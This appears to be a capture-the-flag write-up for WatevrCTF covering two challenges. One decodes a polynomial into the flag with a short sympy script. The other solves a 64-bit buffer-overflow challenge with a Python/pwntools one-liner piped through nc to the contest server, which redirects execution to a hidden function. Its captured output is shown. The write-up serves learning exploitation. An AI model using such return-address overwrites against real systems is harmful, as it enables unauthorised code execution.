Skip to content

Latest commit

 

History

History

WatevrCTF

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 

Hey guys back with another set of few writeups

MISC

Polly-:

description:

I sure do love my polly uh ehh i mean polynomials, heh. Yeah that's what I meant...

Solution:

We were given polly.txt file which contains the polynomial and following observations I conlcuded from them:

  1. Why there are mostly zeroes at the end of denominator in each coefficient
  2. Then 119 is the ascii of 'w'.

then looking for more in direction of approach 2nd I thought, that 119 is the value of polynomial at value '0'. So maybe 'a' will be the value of polynomial at x='1' as we know the flag format 'watevr{'.

Thus scripting it in few lines using sympy. I wonder though it has quite less solves 😕

from sympy import *
y=eval(open("polly.txt","r").read())
x=symbols('x')
print(''.join([chr(y.subs(x,i)) for i in range(57)]))

Here is our flag:

watevr{polly_polynomials_youtube.com/watch?v=THNWVVn9JO0}

PWN

Voting Machine 1-:

description:

In a world with many uncertainties we need some kind of structure. Democracy is a big part of that, therefore we need voting machines! Well, at least if they are safe...

Solution:

We were given 64 bit binary kamikaze

kamikaze: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/l, for GNU/Linux 3.2.0, BuildID[sha1]=0e647f48bd36f15e866166910d10dd173fb0fcf6, not stripped

Upon finding functions 0x0000000000400807 super_secret_function found this but main function wasn't redirecting it. So basic buffer overflow challenge and set the return pointer to this function and then execute it . For offset calculation the buffer size was 2 so adding 8 bytes extra as in 64 bit binary to set the instruction pointer to the right location.

So one liner linux command for that:

(python -c 'from pwn import p64;print "A"*10 +p64(0x00400807)') | nc 13.48.67.196 50000

Hello and welcome to our voting application!
Today's vote will be regarding the administration of
watevr CTF.
the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.
Thanks!
Vote: Thanks for voting!
watevr{w3ll_th4t_w4s_pr3tty_tr1v1al_anyways_https://www.youtube.com/watch?v=Va4aF6rRdqU}

Here is our flag

watevr{w3ll_th4t_w4s_pr3tty_tr1v1al_anyways_https://www.youtube.com/watch?v=Va4aF6rRdqU}